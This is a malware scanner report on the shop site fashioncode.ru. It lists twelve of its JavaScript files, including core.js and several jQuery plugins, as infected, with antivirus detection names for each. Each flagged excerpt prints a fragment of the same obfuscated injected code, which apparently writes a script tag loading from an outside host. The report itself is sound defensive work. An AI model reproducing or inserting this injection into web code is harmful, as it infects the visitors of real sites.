
Malware Scanner report for fashioncode.ru

Malicious/Suspicious/Total urls checked
12/0/15
12 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "fashioncode.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=fashioncode.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fashioncode.ru/

Result: The website is marked by Yandex as suspicious; visiting this website may harm your computer.
Details are available here.

Scanned pages/files

Request | Server response | Status
http://fashioncode.ru/
200 OK
Content-Length: 6009
Content-Type: text/html
clean
http://fashioncode.ru/bitrix/js/main/core/core.js?1364972583
200 OK
Content-Length: 76550
Content-Type: application/x-javascript
malicious
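Malicious code - confirmed by antivirus engines (see below). The excerpt shows the start of the served file and, after the skipped bytes, an obfuscated fragment from further into the file. A near-identical obfuscated fragment appears in the excerpts of the other flagged scripts in this report, which suggests one injection applied across the site's JavaScript files rather than separate infections.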

;(function(){
if (!!window.BX && !!window.BX.extend)
return;
var _bxtmp;
if (!!window.BX)
{
_bxtmp = window.BX;
}
window.BX = function(node, bCache)
{
if (BX.type.isNotEmptyString(node))
{
var ob;
if (!!bCache && null != NODECACHE[node])
ob = NODECACHE[node];
ob = ob || document.getElementById(node);
if (!!bCache)
NODECACHE[node] = ob;
return ob;
}
else if (BX.type.isDomNode(node
... 3426 bytes are skipped ...
$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$$$+$.__+$.__+$.__$+".\\"+$.__$+$.$$_+$._$_+$._+"/\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$._$$+$.__+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"'></\\"+$.__$+$.$$_+$._$$+"\\\"+\\\""+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();}

Antivirus reports:

Avast
JS:Includer-BBO [Trj]
Ad-Aware
Trojan.JS.QVC
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
DrWeb
JS.IFrame.579
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
Sophos
Troj/JSRedir-HZ
GData
Trojan.JS.QVC
ESET-NOD32
JS/Agent.NLZ
BitDefender
Trojan.JS.QVC

http://fashioncode.ru/bitrix/js/main/core/core_ajax.js?1364972585
200 OK
Content-Length: 30467
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

;(function(window){
if (window.BX.ajax)
return;
var
BX = window.BX,
tempDefaultConfig = {},
defaultConfig = {
method: 'GET', dataType: 'html', timeout: 0, async: true, processData: true, scriptsRunFirst: false, emulateOnload: true,
start: true, cache: true, preparePost: true, headers: false, lsTimeout: 30, lsForce: false
},
ajax_session = null,
loadedScripts = {},
loadedScriptsQueue = [],
r = {
'url_utf
... 3333 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://fashioncode.ru/bitrix/js/main/session.js?1364972583
200 OK
Content-Length: 5606
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function CBXSession()
{
var _this = this;
this.mess = {};
this.timeout = null;
this.sessid = null;
this.bShowMess = true;
this.dateStart = new Date();
this.dateInput = new Date();
this.dateCheck = new Date();
this.activityInterval = 0;
this.notifier = null;

this.Expand = function(timeout, sessid, bShowMess, key)
{
this.timeout = timeout;
this.sessid = sessid;
this.bShowMess = bShowMess;
this.key = key;<
... 4439 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://fashioncode.ru/butik/
200 OK
Content-Length: 29575
Content-Type: text/html
clean
http://fashioncode.ru/bitrix/templates/eshop_blue/js/jquery-1.8.2.min.js
200 OK
Content-Length: 95884
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a,b){function G(a){var b=F[a]={};return p.each(a.split(s),function(a,c){b[c]=!0}),b}function J(a,c,d){if(d===b&&a.nodeType===1){var e="data-"+c.replace(I,"-$1").toLowerCase();d=a.getAttribute(e);if(typeof d=="string"){try{d=d==="true"?!0:d==="false"?!1:d==="null"?null:+d+""===d?+d:H.test(d)?p.parseJSON(d):d}catch(f){}p.data(a,c,d)}else d=b}return d}function K(a){var b;for(b in a){if(b==="data"&&p.isEmptyObject(a[b]))continue;if(b!=="toJSON")return!1}return!0}function ba
... 3119 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://fashioncode.ru/bitrix/js/socialservices/ss.js?1364972585
200 OK
Content-Length: 3868
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function BxShowAuthService(id, suffix)
{
var bxCurrentAuthId = '';
if(window['bxCurrentAuthId'+suffix])
bxCurrentAuthId = window['bxCurrentAuthId'+suffix];
BX('bx_auth_serv'+suffix).style.display = '';
if(bxCurrentAuthId != '' && bxCurrentAuthId != id)
{
BX('bx_auth_href_'+suffix+bxCurrentAuthId).className = '';
BX('bx_auth_serv_'+suffix+bxCurrentAuthId).style.display = 'none';
}
BX('bx_auth_href_'+suffix+id).className = 'bx-ss-se
... 2427 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://fashioncode.ru/bitrix/templates/eshop_blue/js/slides.min.jquery.js
200 OK
Content-Length: 10151
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($){$.fn.slides=function(option){option=$.extend({},$.fn.slides.option,option);return this.each(function(){$('.'+option.container,$(this)).children().wrapAll('<div class="slides_control"/>');var elem=$(this),control=$('.slides_control',elem),total=control.children().size(),width=control.children().outerWidth(),height=control.children().outerHeight(),start=option.start-1,effect=option.effect.indexOf(',')<0?option.effect:option.effect.replace(' ','').split(',')[0],paginationEffec
... 3078 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://fashioncode.ru/bitrix/templates/eshop_blue/script.js
200 OK
Content-Length: 30514
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

$(".tabsblock > .tabs > a").live('click', function() {
var ind = $(this).index();
ind++;
if ($(this).hasClass("active")){} else
{
$(this).parents('.tabsblock').find('.active').removeClass('active')
$(this).addClass('active');
$(".tabsblock").find(".cnt:nth-child("+ind+")").addClass('active');
}
return false;
});
$("#notify_auth_form > .social > form > ul > li > a").live('click', function() {
setTimeout(function()
... 3272 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://fashioncode.ru/bitrix/templates/eshop_blue/js/jquery.carouFredSel-5.6.4-packed.js
200 OK
Content-Length: 34773
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H($){8($.1P.1J)J;$.1P.1J=H(y,z){8(1g.V==0){1e(N,\'5s 4q 6u 1m "\'+1g.3U+\'".\');J 1g}8(1g.V>1){J 1g.1K(H(){$(1g).1J(y,z)})}F A=1g,$19=1g[0];8(A.1r(\'4r\')){F B=A.1D
... 3047 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://fashioncode.ru/bitrix/templates/eshop_blue/js/jquery.cookie.js
200 OK
Content-Length: 6820
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { options = options || {};
if (value === null) {
value = '';
options = $.extend({}, options); options.expires = -1;
}
var expires = '';
if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) {
var date;
if (typeof options.expires ==
... 2584 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://fashioncode.ru/bitrix/templates/eshop_blue/js/jquery.slideViewerPro.1.5.js
200 OK
Content-Length: 12994
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery.extend( jQuery.easing, {
easeInOutExpo: function (x, t, b, c, d) {
if (t==0) return b;
if (t==d) return b+c;
if ((t/=d/2) < 1) return c/2 * Math.pow(2, 10 * (t - 1)) + b;
return c/2 * (-Math.pow(2, -10 * --t) + 2) + b;
}
});
jQuery(function(){
jQuery("div.svwp").prepend("<img src='images/svwloader.gif' class='ldrgif' alt='loading...'/ >"); });
var j = 0;
jQuery.fn.slideViewerPro = function(settings) {
settings = jQue
... 3287 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://fashioncode.ru/bitrix/templates/eshop_blue/js/jquery.timers.js
200 OK
Content-Length: 5656
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery.fn.extend({
everyTime: function(interval, label, fn, times, belay) {
return this.each(function() {
jQuery.timer.add(this, interval, label, fn, times, belay);
});
},
oneTime: function(interval, label, fn) {
return this.each(function() {
jQuery.timer.add(this, interval, label, fn, 1);
});
},
stopTime: function(label, fn) {
return this.each(function() {
jQuery.timer.remove(this, label, fn);
});
}
});
... 4560 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://fashioncode.ru/bitrix/templates/eshop_blue/components/bitrix/menu/horizontal_multilevel/script.js?1364972300
200 OK
Content-Length: 2918
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var jshover = function()
{
var menuDiv = document.getElementById("horizontal-multilevel-menu")
if (!menuDiv)
return;
var sfEls = menuDiv.getElementsByTagName("li");
for (var i=0; i<sfEls.length; i++)
{
sfEls[i].onmouseover=function()
{
this.className+=" jshover";
}
sfEls[i].onmouseout=function()
{
this.className=this.className.replace(new RegExp(" jshover\\b"), "");
}
}
}
if (window.attachEvent
... 1369 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://fashioncode.ru/special-offer/
200 OK
Content-Length: 36027
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: fashioncode.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 26 Aug 2014 11:56:31 GMT
Pragma: no-cache
Server: DataPalm/3.5
Content-Length: 6009
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Set-Cookie: PHPSESSID=bbd9a13cf4d3d275d4fecdaae2b2fde0; path=/
X-Powered-CMS: Bitrix Site Manager (4be2b5d1fc90fdee13b7766422e8e6ae)

...6009 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fashioncode.ru
Referer: http://www.google.com/search?q=fashioncode.ru

Result:
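The result is similar to the first query. No suspicious redirects were found. This check compares only the HTTP responses to the two requests above; the script injections listed under "Scanned pages/files" are detected and reported separately.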